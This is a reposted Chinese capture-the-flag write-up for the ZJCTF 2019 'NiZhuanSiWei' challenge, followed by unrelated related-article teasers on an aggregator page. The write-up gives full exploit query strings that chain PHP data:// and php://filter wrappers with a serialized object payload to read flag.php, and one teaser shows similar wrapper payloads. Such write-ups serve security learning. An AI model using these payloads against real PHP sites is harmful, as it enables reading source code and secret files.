[ZJCTF 2019]NiZhuanSiWei-编程知识

[ZJCTF 2019]NiZhuanSiWei

news/2024/11/15 4:26:48/文章来源:https://blog.csdn.net/m0_46056107/article/details/134611976

虽然有include函数但我们无法直接包含flag因为对file进行了过滤，又看见有反序列化的入口，只是并没有发现可利用的方法，但题目有提示所以尝试将其调出来

php伪协议写入内容

看到file_get_contents函数想到使用data协议，去封装一个流，然后保险起见include使用了filter，data：写入内容为welcome to the zjctf，&加入php伪协议来读取useless.php

payload如下：

?text=data://text/plain,welcome to the zjctf&file=php://filter/convert.base64-encode/resource=useless.php

给file变量在赋值读取flag.php

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

将前面的伪协议去掉，最终的poc是：

/?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/216643.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

CANdelaStudio 使用教程2 新建 Interface

CANdelaStudio 使用教程2 新建 Interface

文章目录简述ECU Information1、Supported Interfaces2、Services supported for interfaces 简述新增 Interface 的话，只能在 CDDT 文件中新增，CDD 文件中只能选择接口 ECU Information 1、Supported Interfaces 创建和编辑ECU应支持的接口 1、…

阅读更多...

单片非晶磁性测量系统非晶测量方法

单片非晶磁性测量系统非晶测量方法

非晶测量方法单片法是国际主流的非晶测量方法之一，如美标 A932 和日标 H7152 均早已提出了该方法；2014 年 IEC 起草的标准，和我国 2015 年重新修订的 GB/T 19345.1 标准中均明确提出了单片法测量非晶磁性能。单片法与环样法相比&#xff0c…

阅读更多...

oracle的debjob挂載及查詢

oracle的debjob挂載及查詢

背景有一個需求需要定時去執行一個produce，可以使用oracle的dbjob定時執行，相比較之前的vbs更加絲滑 --傳遞produce 開始的時間頻率 declarea number;beginDBMS_JOB.SUBMIT(a,xx_warehouse_daliy_record_p;,to_date(202311230800,yyyymmddhh24mi),…

阅读更多...

[SWPUCTF 2021 新生赛]PseudoProtocols

[SWPUCTF 2021 新生赛]PseudoProtocols

题目很明确了就是伪协议 php://filter/convert.base64-encode/resourcehint.php 提交的伪协议的内容需要是 I want flag，就会echo flag 方法1：adata://text/plain,I want flag 方法2：adata://text/plain;base64,SSB3YW50IGZsYWc

阅读更多...

VMware Workstation Pro 安装虚拟机，无法打开此虚拟机电源因为它需要使用x86架构，架构冲突

VMware Workstation Pro 安装虚拟机，无法打开此虚拟机电源因为它需要使用x86架构，架构冲突

本来我下的iso文件，可以看到他是64的，但是ubuntu没有86的，我只能去下载cenos的用这个去安装虚拟机就好了

阅读更多...

Vue3-Pinia

Vue3-Pinia

Pinia是什么 Pinia是Vue的最新状态管理工具，是Vuex的替代品比Vuex更大的优势在于： 1.提供更加简单的API（去掉了mutation） 2.提供符合，组合式风格的API（和Vue3新语法统一） 3.去掉了modules…

阅读更多...

2023年微软开源八个人工智能项目

2023年微软开源八个人工智能项目

自2001年软件巨头微软前首席执行官史蒂夫鲍尔默对开源（尤其是Linux）发表尖刻言论以来，微软正在开源方面取得了长足的进步。继ChatGPT于去年年底发布了后，微软的整个2023年，大多数技术都是面向开发人员和研究人员公开发…

阅读更多...

windows环境下使用arthas不启动服务替换文件

windows环境下使用arthas不启动服务替换文件

场景： windows环境，如果现场环境客户正在使用项目，如果要替换项目中的一个class文件，但是又不能重启服务改怎么处理，今天介绍使用arthas中的retransform命令动态替换及使用注意的事项。环境： windows,arth…

阅读更多...

qgis添加arcgis的FeatureServer

qgis添加arcgis的FeatureServer

左侧浏览器-ArcGIS要素服务器-新建连接 http://sampleserver6.arcgisonline.com/arcgis/rest/services/ 展开-双击即可

阅读更多...

AI 视频 | Stable Video Diffusion 来了！（附体验地址）

AI 视频 | Stable Video Diffusion 来了！（附体验地址）

1. 介绍 11 月 21 日，Stability AI 推出了 Stable Video Diffusion，这是 Stability AI 的第一个基于图像模型 Stable Diffusion 的生成式视频基础模型。目前 Stability AI 已经在 GitHub 上开源了 Stable Video Diffusion 的代码，在 Huggin…

阅读更多...

分布式篇---第六篇

分布式篇---第六篇

系列文章目录文章目录系列文章目录前言一、说说什么是漏桶算法二、说说什么是令牌桶算法三、数据库如何处理海量数据？前言前些天发现了一个巨牛的人工智能学习网站，通俗易懂，风趣幽默，忍不住分享一下给大家。点击跳转到网站，这篇文章男女通用，看懂了就去分享给你的码…

阅读更多...

Ubuntu18.4中安装wkhtmltopdf + Odoo16配置【二】

Ubuntu18.4中安装wkhtmltopdf + Odoo16配置【二】

deepin Linux 安装wkhtmltopdf 1、先从官网的链接里下载linux对应的包 wkhtmltopdf/wkhtmltopdf 下载需要的版本，推荐版本，新测有效： wkhtmltox-0.12.4_linux-generic-amd64.tar.xz 2、解压下载的文件解压后会有一个wkhtmltox文件夹 3…

阅读更多...

推荐文章

最新文章